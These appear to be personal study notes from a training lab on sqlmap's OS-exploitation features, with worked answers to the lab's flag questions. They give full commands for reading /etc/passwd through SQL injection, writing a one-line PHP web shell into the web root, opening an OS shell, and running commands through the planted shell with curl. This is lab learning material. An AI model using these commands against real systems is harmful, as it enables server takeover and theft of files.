SQLMap Essentials
OS Exploitation
File Read/Write
--is-dba
checks whether the database user the application connects with has DBA (administrator-level) privileges
sqlmap -u "http://www.galapagh0st.com/case1.php?id=1" --is-dba
Do this first to gauge whether file read/write is likely to work. On MySQL, LOAD_FILE() and SELECT ... INTO OUTFILE/DUMPFILE need the FILE privilege, which a DBA user has; a non-DBA user can also hold FILE, so if --is-dba says false, check with --privileges before giving up.
Even with the privilege, reads and writes are limited by secure_file_priv and by what the database process's OS user can access, and every path is on the database server, which is not always the same host as the web server.
--file-read "/etc/passwd"
makes sqlmap read the given file from the database server's filesystem and show it (a copy is also saved under sqlmap's output directory for the target)
sqlmap -u "http://www.galapagh0st.com/?id=1" --file-read "/etc/passwd"
Writing Local Files
First we prepare the file we want to write to the server. Something basic might be a one-line PHP web shell:
echo '<?php system($_GET["cmd"]); ?>' > shell.php
Then we use --file-write (the local file) together with --file-dest (the absolute destination path on the server) to upload it:
sqlmap -u "http://www.galapagh0st.com/?id=1" --file-write "shell.php" --file-dest "/var/www/html/shell.php"
The destination directory must be writable by the database process (not the web server user) and must be served by the web server, otherwise the write succeeds but the shell is unreachable. Use the web server's real document root if /var/www/html is only a guess.
OS Command Execution
--os-shell
opens an interactive prompt that runs OS commands on the database server. On MySQL this works by uploading a small web shell stager with the file-write technique, which is why sqlmap asks for the web application language and a writable web directory; the same FILE privilege and secure_file_priv conditions as above apply.
sqlmap -u "http://www.galapagh0st.com/?id=1" --os-shell
If this fails with an error, try forcing a specific injection technique with --technique, for example error-based (E). Other letters are B (boolean-based blind), U (UNION query), S (stacked queries), T (time-based blind) and Q (inline queries).
sqlmap -u "http://www.example.com/?id=1" --os-shell --technique=E
NOTE: The above technique is error-based.
Questions: OS Exploitation
Question 1: Try to read the file in /var/www/html/flag.txt
sqlmap -u "http://83.136.251.75:31122/?id=1" --file-read "/var/www/html/flag.txt"
Question 2: Build a shell and find the other flag
I built the shell from the example like so:
echo '<?php system($_GET["cmd"]); ?>' > shell.php
Then I URL-encoded and ran the command find / -type f -name "*flag*"
to find all files across the system with "flag" in the name:
curl '83.136.251.75:31122/shell.php?cmd=find%20%2F%20-type%20f%20-name%20%22%2Aflag%2A%22'
I checked /var/www/html/flag.txt,
but that was the flag we had already used, so I grabbed /flag.txt:
curl '83.136.251.75:31122/shell.php?cmd=cat%20%2Fflag.txt'
Got the flag.